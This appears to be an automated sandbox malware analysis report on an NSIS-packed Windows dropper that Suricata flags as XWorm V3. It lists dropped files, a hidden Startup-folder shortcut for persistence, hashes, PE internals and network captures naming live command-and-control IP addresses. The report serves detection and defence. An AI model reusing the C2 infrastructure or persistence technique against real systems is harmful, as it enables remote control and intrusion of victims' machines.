                                                                    Entropy (8bit):4.038920595031593
                                                                    Encrypted:false
                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                    Malicious:false
                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3ogmp33g.xj5.ps1

                                                                    Download File
                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                    File Type:ASCII text, with no line terminators
                                                                    Category:dropped
                                                                    Size (bytes):60
                                                                    Entropy (8bit):4.038920595031593
                                                                    Encrypted:false
                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                    Malicious:false
                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4ignzlvx.cxu.ps1

                                                                    Download File
                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                    File Type:ASCII text, with no line terminators
                                                                    Category:dropped
                                                                    Size (bytes):60
                                                                    Entropy (8bit):4.038920595031593
                                                                    Encrypted:false
                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                    Malicious:false
                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fz0ixo0e.pgi.psm1

                                                                    Download File
                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                    File Type:ASCII text, with no line terminators
                                                                    Category:dropped
                                                                    Size (bytes):60
                                                                    Entropy (8bit):4.038920595031593
                                                                    Encrypted:false
                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                    Malicious:false
                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_n3tofjkj.amr.psm1

                                                                    Download File
                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                    File Type:ASCII text, with no line terminators
                                                                    Category:dropped
                                                                    Size (bytes):60
                                                                    Entropy (8bit):4.038920595031593
                                                                    Encrypted:false
                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                    Malicious:false
                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ofqtbpis.050.ps1

                                                                    Download File
                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                    File Type:ASCII text, with no line terminators
                                                                    Category:dropped
                                                                    Size (bytes):60
                                                                    Entropy (8bit):4.038920595031593
                                                                    Encrypted:false
                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                    Malicious:false
                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_olyxbyio.zvf.ps1

                                                                    Download File
                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                    File Type:ASCII text, with no line terminators
                                                                    Category:dropped
                                                                    Size (bytes):60
                                                                    Entropy (8bit):4.038920595031593
                                                                    Encrypted:false
                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                    Malicious:false
                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rrxeykur.yby.ps1

                                                                    Download File
                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                    File Type:ASCII text, with no line terminators
                                                                    Category:dropped
                                                                    Size (bytes):60
                                                                    Entropy (8bit):4.038920595031593
                                                                    Encrypted:false
                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                    Malicious:false
                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_s11bhfdd.gum.psm1

                                                                    Download File
                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                    File Type:ASCII text, with no line terminators
                                                                    Category:dropped
                                                                    Size (bytes):60
                                                                    Entropy (8bit):4.038920595031593
                                                                    Encrypted:false
                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                    Malicious:false
                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_uhcdadrz.yza.psm1

                                                                    Download File
                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                    File Type:ASCII text, with no line terminators
                                                                    Category:dropped
                                                                    Size (bytes):60
                                                                    Entropy (8bit):4.038920595031593
                                                                    Encrypted:false
                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                    Malicious:false
                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ynd0ul4l.mv2.psm1

                                                                    Download File
                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                    File Type:ASCII text, with no line terminators
                                                                    Category:dropped
                                                                    Size (bytes):60
                                                                    Entropy (8bit):4.038920595031593
                                                                    Encrypted:false
                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                    Malicious:false
                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                    C:\Users\user\AppData\Local\Temp\nsg9061.tmp\System.dll

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\yVVZdG2NJX.exe
                                                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):11776
                                                                    Entropy (8bit):5.890541747176257
                                                                    Encrypted:false
                                                                    SSDEEP:192:X24sihno0bW+l97H4GB7QDs91kMtwtobTr4u+QHbazMNHT7dmNIEr:m8vJl97JeoxtN/r3z7YV
                                                                    MD5:75ED96254FBF894E42058062B4B4F0D1
                                                                    SHA1:996503F1383B49021EB3427BC28D13B5BBD11977
                                                                    SHA-256:A632D74332B3F08F834C732A103DAFEB09A540823A2217CA7F49159755E8F1D7
                                                                    SHA-512:58174896DB81D481947B8745DAFE3A02C150F3938BB4543256E8CCE1145154E016D481DF9FE68DAC6D48407C62CBE20753320EBD5FE5E84806D07CE78E0EB0C4
                                                                    Malicious:false
                                                                    Antivirus:
                                                                    • Antivirus: ReversingLabs, Detection: 3%
                                                                    Joe Sandbox View:
                                                                    • Filename: ORDER 20240986 OA.exe, Detection: malicious, Browse
                                                                    • Filename: PayeeAdvice_HK54912_R0038704_37504.exe, Detection: malicious, Browse
                                                                    • Filename: Conchoids12.exe, Detection: malicious, Browse
                                                                    • Filename: Korrekturlsning.exe, Detection: malicious, Browse
                                                                    • Filename: Conchoids12.exe, Detection: malicious, Browse
                                                                    • Filename: Korrekturlsning.exe, Detection: malicious, Browse
                                                                    • Filename: rTransferenciarealizada451236.exe, Detection: malicious, Browse
                                                                    • Filename: rTransferenciarealizada451236.exe, Detection: malicious, Browse
                                                                    • Filename: Purchase Order Purchase Order Purchase Order Purchase Order.exe, Detection: malicious, Browse
                                                                    • Filename: Purchase Order Purchase Order Purchase Order Purchase Order.exe, Detection: malicious, Browse
                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......qr*.5.D.5.D.5.D...J.2.D.5.E.!.D.....2.D.a0t.1.D.V1n.4.D..3@.4.D.Rich5.D.........PE..L.....oZ...........!..... ...........).......0...............................`............@..........................2.......0..P............................P.......................................................0..X............................text............ .................. ..`.rdata..c....0.......$..............@..@.data...x....@.......(..............@....reloc..~....P.......*..............@..B................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\yVVZdG2NJX.lnk

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\yVVZdG2NJX.exe
                                                                    File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Sun Nov 24 14:37:58 2024, mtime=Sun Nov 24 14:37:58 2024, atime=Sun Nov 24 14:37:58 2024, length=568338, window=hide
                                                                    Category:dropped
                                                                    Size (bytes):780
                                                                    Entropy (8bit):5.184083524925253
                                                                    Encrypted:false
                                                                    SSDEEP:12:8XyByXK+4mggSYChylZY//6sGcrjL5vwoOjAGNHqK09p7x7PmV:8XyByXkXe3SCsd50APzp9m
                                                                    MD5:E9C48A93ECF30E0FC7ADC942EF700F99
                                                                    SHA1:DF646A5228760C031240F2ED3E5DB6DB0DFCF89C
                                                                    SHA-256:5D9EF200BE2A0250F774FC64B32E7CA3791CF984505FE66DDC3CB34D36591E0B
                                                                    SHA-512:B7701AB47D4DFA99B53A5BE5100E2CAFD0D84084E7F8E1E15E64E14B8D5F200CE53F281415201CF25FB8ED9503E2F32EEAF5939CBE37F1CE768C23FB8AF35338
                                                                    Malicious:false
                                                                    Preview:L..................F.... ....O..>...O..>...O..>..........................~.:..DG..Yr?.D..U..k0.&...&.........5q........>......>......t...CFSF..1.....EW)N..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW)NxY.|...........................c..A.p.p.D.a.t.a...B.V.1.....xY.|..Roaming.@......EW)NxY.|...........................v..R.o.a.m.i.n.g.....j.2.....xY.| .YVVZDG~1.EXE..N......xY.|xY.|..........................E..y.V.V.Z.d.G.2.N.J.X...e.x.e.......[...............-.......Z...........F6.......C:\Users\user\AppData\Roaming\yVVZdG2NJX.exe........\.....\.....\.....\.....\.y.V.V.Z.d.G.2.N.J.X...e.x.e.`.......X.......585948...........hT..CrF.f4... ./.f.z....+...E...hT..CrF.f4... ./.f.z....+...E..E.......9...1SPS..mD..pH.H@..=x.....h....H.....K...YM...?................

                                                                    C:\Users\user\AppData\Roaming\yVVZdG2NJX.exe

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\yVVZdG2NJX.exe
                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                    Category:dropped
                                                                    Size (bytes):568338
                                                                    Entropy (8bit):7.747481849809548
                                                                    Encrypted:false
                                                                    SSDEEP:12288:32EIiN/Z1++w1p+wJuQbIgJwCQBk5wBcamd3ZhZs:3wiN/K+wHBfhQBk5s3mdPZs
                                                                    MD5:18EA5087EB82E075CA35D2B2DCFF9450
                                                                    SHA1:DC436FBAA777672D44A8B90B98C4A1C266885845
                                                                    SHA-256:A7247C64CC0168290CA3B210E59EF629B46F513205BC6562EC79CDD2CDA71725
                                                                    SHA-512:8FBEB3CAF13A3FE1359002C2848FF5767E6B2F226049546C683F2B6144756196CFE39F66E4959C8426CDFAEFF6A169A4CF5939DE241E4A898887D8810EC620C6
                                                                    Malicious:true
                                                                    Antivirus:
                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                    • Antivirus: ReversingLabs, Detection: 42%
                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........!`G.@...@...@../OQ..@...@..I@../OS..@...c>..@..+F...@..Rich.@..........................PE..L.....oZ.................d....:.....l3............@...........................=...........@..........................................p<..p...........................................................................................................text....d.......d.................. ..`.rdata...............h..............@..@.data...8.9..........|..............@....ndata........:..........................rsrc....p...p<..p..................@..@................................................................................................................................................................................................................................................................................................................................................

                                                                    Static File Info

                                                                    General

                                                                    File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                    Entropy (8bit):7.747481849809548
                                                                    TrID:
                                                                    • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                    • Generic Win/DOS Executable (2004/3) 0.02%
                                                                    • DOS Executable Generic (2002/1) 0.02%
                                                                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                    File name:yVVZdG2NJX.exe
                                                                    File size:568'338 bytes
                                                                    MD5:18ea5087eb82e075ca35d2b2dcff9450
                                                                    SHA1:dc436fbaa777672d44a8b90b98c4a1c266885845
                                                                    SHA256:a7247c64cc0168290ca3b210e59ef629b46f513205bc6562ec79cdd2cda71725
                                                                    SHA512:8fbeb3caf13a3fe1359002c2848ff5767e6b2f226049546c683f2b6144756196cfe39f66e4959c8426cdfaeff6a169a4cf5939de241e4a898887d8810ec620c6
                                                                    SSDEEP:12288:32EIiN/Z1++w1p+wJuQbIgJwCQBk5wBcamd3ZhZs:3wiN/K+wHBfhQBk5s3mdPZs
                                                                    TLSH:27C4E050F15CE897E52B15718C7FD531169BBB5CA1F8420E329A7A1A69E334320AFE0F
                                                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........!`G.@...@...@../OQ..@...@..I@../OS..@...c>..@..+F...@..Rich.@..........................PE..L.....oZ.................d....:....

                                                                    File Icon

                                                                    Icon Hash:38206a6a62666429

                                                                    Static PE Info

                                                                    General

                                                                    Entrypoint:0x40336c
                                                                    Entrypoint Section:.text
                                                                    Digitally signed:false
                                                                    Imagebase:0x400000
                                                                    Subsystem:windows gui
                                                                    Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                                    DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                    Time Stamp:0x5A6FED1F [Tue Jan 30 03:57:19 2018 UTC]
                                                                    TLS Callbacks:
                                                                    CLR (.Net) Version:
                                                                    OS Version Major:4
                                                                    OS Version Minor:0
                                                                    File Version Major:4
                                                                    File Version Minor:0
                                                                    Subsystem Version Major:4
                                                                    Subsystem Version Minor:0
                                                                    Import Hash:b34f154ec913d2d2c435cbd644e91687

                                                                    Entrypoint Preview

                                                                    Instruction
                                                                    sub esp, 000002D4h
                                                                    push ebx
                                                                    push esi
                                                                    push edi
                                                                    push 00000020h
                                                                    pop edi
                                                                    xor ebx, ebx
                                                                    push 00008001h
                                                                    mov dword ptr [esp+14h], ebx
                                                                    mov dword ptr [esp+10h], 0040A2E0h
                                                                    mov dword ptr [esp+1Ch], ebx
                                                                    call dword ptr [004080A8h]
                                                                    call dword ptr [004080A4h]
                                                                    and eax, BFFFFFFFh
                                                                    cmp ax, 00000006h
                                                                    mov dword ptr [007A8A2Ch], eax
                                                                    je 00007FE748B24D63h
                                                                    push ebx
                                                                    call 00007FE748B28015h
                                                                    cmp eax, ebx
                                                                    je 00007FE748B24D59h
                                                                    push 00000C00h
                                                                    call eax
                                                                    mov esi, 004082B0h
                                                                    push esi
                                                                    call 00007FE748B27F8Fh
                                                                    push esi
                                                                    call dword ptr [00408150h]
                                                                    lea esi, dword ptr [esi+eax+01h]
                                                                    cmp byte ptr [esi], 00000000h
                                                                    jne 00007FE748B24D3Ch
                                                                    push 0000000Ah
                                                                    call 00007FE748B27FE8h
                                                                    push 00000008h
                                                                    call 00007FE748B27FE1h
                                                                    push 00000006h
                                                                    mov dword ptr [007A8A24h], eax
                                                                    call 00007FE748B27FD5h
                                                                    cmp eax, ebx
                                                                    je 00007FE748B24D61h
                                                                    push 0000001Eh
                                                                    call eax
                                                                    test eax, eax
                                                                    je 00007FE748B24D59h
                                                                    or byte ptr [007A8A2Fh], 00000040h
                                                                    push ebp
                                                                    call dword ptr [00408044h]
                                                                    push ebx
                                                                    call dword ptr [004082A0h]
                                                                    mov dword ptr [007A8AF8h], eax
                                                                    push ebx
                                                                    lea eax, dword ptr [esp+34h]
                                                                    push 000002B4h
                                                                    push eax
                                                                    push ebx
                                                                    push 0079FEE0h
                                                                    call dword ptr [00408188h]
                                                                    push 0040A2C8h

                                                                    Rich Headers

                                                                    Programming Language:
                                                                    • [EXP] VC++ 6.0 SP5 build 8804

                                                                    Data Directories

                                                                    NameVirtual AddressVirtual Size Is in Section
                                                                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_IMPORT0x84fc0xa0.rdata
                                                                    IMAGE_DIRECTORY_ENTRY_RESOURCE0x3c70000x17000.rsrc
                                                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_IAT0x80000x2b0.rdata
                                                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                    Sections

                                                                    NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                    .text0x10000x64000x6400eed0986138e3ef22dbb386f4760a55c0False0.6783203125data6.511089687733535IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                    .rdata0x80000x138e0x14002914bac53cd4485c9822093463e4eea6False0.4509765625data5.146454805063938IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                    .data0xa0000x39eb380x60009e0c528682cd2747c63b7ba39c2cc23unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                    .ndata0x3a90000x1e0000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                    .rsrc0x3c70000x170000x17000c8f8279129ad38fd03ee7b50a97e5aeaFalse0.21903659986413043data5.096977274603887IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                                    Resources

                                                                    NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                    RT_BITMAP0x3c73880x368Device independent bitmap graphic, 96 x 16 x 4, image size 768EnglishUnited States0.23623853211009174
                                                                    RT_ICON0x3c76f00x10828Device independent bitmap graphic, 128 x 256 x 32, image size 67584EnglishUnited States0.16976221459836743
                                                                    RT_ICON0x3d7f180x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600EnglishUnited States0.32863070539419087
                                                                    RT_ICON0x3da4c00x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224EnglishUnited States0.42424953095684803
                                                                    RT_ICON0x3db5680xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colorsEnglishUnited States0.30730277185501065
                                                                    RT_ICON0x3dc4100x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colorsEnglishUnited States0.32445848375451264
                                                                    RT_ICON0x3dccb80x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colorsEnglishUnited States0.2579479768786127
                                                                    RT_ICON0x3dd2200x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088EnglishUnited States0.6374113475177305
                                                                    RT_DIALOG0x3dd6880x144dataEnglishUnited States0.5216049382716049
                                                                    RT_DIALOG0x3dd7d00x13cdataEnglishUnited States0.5506329113924051
                                                                    RT_DIALOG0x3dd9100x100dataEnglishUnited States0.5234375
                                                                    RT_DIALOG0x3dda100x11cdataEnglishUnited States0.6056338028169014
                                                                    RT_DIALOG0x3ddb300xc4dataEnglishUnited States0.5918367346938775
                                                                    RT_DIALOG0x3ddbf80x60dataEnglishUnited States0.7291666666666666
                                                                    RT_GROUP_ICON0x3ddc580x68dataEnglishUnited States0.7211538461538461
                                                                    RT_MANIFEST0x3ddcc00x33eXML 1.0 document, ASCII text, with very long lines (830), with no line terminatorsEnglishUnited States0.5542168674698795

                                                                    Imports

                                                                    DLLImport
                                                                    KERNEL32.dllSetEnvironmentVariableW, SetFileAttributesW, Sleep, GetTickCount, GetFileSize, GetModuleFileNameW, GetCurrentProcess, CopyFileW, SetCurrentDirectoryW, GetFileAttributesW, GetWindowsDirectoryW, GetTempPathW, GetCommandLineW, GetVersion, SetErrorMode, lstrlenW, lstrcpynW, GetDiskFreeSpaceW, ExitProcess, GetShortPathNameW, CreateThread, GetLastError, CreateDirectoryW, CreateProcessW, RemoveDirectoryW, lstrcmpiA, CreateFileW, GetTempFileNameW, WriteFile, lstrcpyA, MoveFileExW, lstrcatW, GetSystemDirectoryW, GetProcAddress, GetModuleHandleA, GetExitCodeProcess, WaitForSingleObject, lstrcmpiW, MoveFileW, GetFullPathNameW, SetFileTime, SearchPathW, CompareFileTime, lstrcmpW, CloseHandle, ExpandEnvironmentStringsW, GlobalFree, GlobalLock, GlobalUnlock, GlobalAlloc, FindFirstFileW, FindNextFileW, DeleteFileW, SetFilePointer, ReadFile, FindClose, lstrlenA, MulDiv, MultiByteToWideChar, WideCharToMultiByte, GetPrivateProfileStringW, WritePrivateProfileStringW, FreeLibrary, LoadLibraryExW, GetModuleHandleW
                                                                    USER32.dllGetSystemMenu, SetClassLongW, EnableMenuItem, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongW, SetCursor, LoadCursorW, CheckDlgButton, GetMessagePos, LoadBitmapW, CallWindowProcW, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, OpenClipboard, ScreenToClient, GetWindowRect, GetDlgItem, GetSystemMetrics, SetDlgItemTextW, GetDlgItemTextW, MessageBoxIndirectW, CharPrevW, CharNextA, wsprintfA, DispatchMessageW, PeekMessageW, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, DrawTextW, EndDialog, RegisterClassW, SystemParametersInfoW, CreateWindowExW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, GetDC, SetTimer, SetWindowTextW, LoadImageW, SetForegroundWindow, ShowWindow, IsWindow, SetWindowLongW, FindWindowExW, TrackPopupMenu, AppendMenuW, CreatePopupMenu, EndPaint, CreateDialogParamW, SendMessageTimeoutW, wsprintfW, PostQuitMessage
                                                                    GDI32.dllSelectObject, SetBkMode, CreateFontIndirectW, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor
                                                                    SHELL32.dllSHGetSpecialFolderLocation, ShellExecuteExW, SHGetPathFromIDListW, SHBrowseForFolderW, SHGetFileInfoW, SHFileOperationW
                                                                    ADVAPI32.dllAdjustTokenPrivileges, RegCreateKeyExW, RegOpenKeyExW, SetFileSecurityW, OpenProcessToken, LookupPrivilegeValueW, RegEnumValueW, RegDeleteKeyW, RegDeleteValueW, RegCloseKey, RegSetValueExW, RegQueryValueExW, RegEnumKeyW
                                                                    COMCTL32.dllImageList_Create, ImageList_AddMasked, ImageList_Destroy
                                                                    ole32.dllOleUninitialize, OleInitialize, CoTaskMemFree, CoCreateInstance

                                                                    Possible Origin

                                                                    Language of compilation systemCountry where language is spokenMap
                                                                    EnglishUnited States

                                                                    Network Behavior

                                                                    Suricata IDS Alerts

                                                                    TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                    2024-11-24T16:37:41.543353+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.1049776185.244.144.6880TCP
                                                                    2024-11-24T16:38:12.671473+01002855924ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound1192.168.2.104982187.121.86.84020TCP

                                                                    Network Port Distribution

                                                                    TCP Packets

                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                    Nov 24, 2024 16:37:40.036418915 CET4977680192.168.2.10185.244.144.68
                                                                    Nov 24, 2024 16:37:40.156024933 CET8049776185.244.144.68192.168.2.10
                                                                    Nov 24, 2024 16:37:40.156169891 CET4977680192.168.2.10185.244.144.68
                                                                    Nov 24, 2024 16:37:40.158443928 CET4977680192.168.2.10185.244.144.68
                                                                    Nov 24, 2024 16:37:40.278223038 CET8049776185.244.144.68192.168.2.10
                                                                    Nov 24, 2024 16:37:41.542453051 CET8049776185.244.144.68192.168.2.10
                                                                    Nov 24, 2024 16:37:41.543064117 CET8049776185.244.144.68192.168.2.10
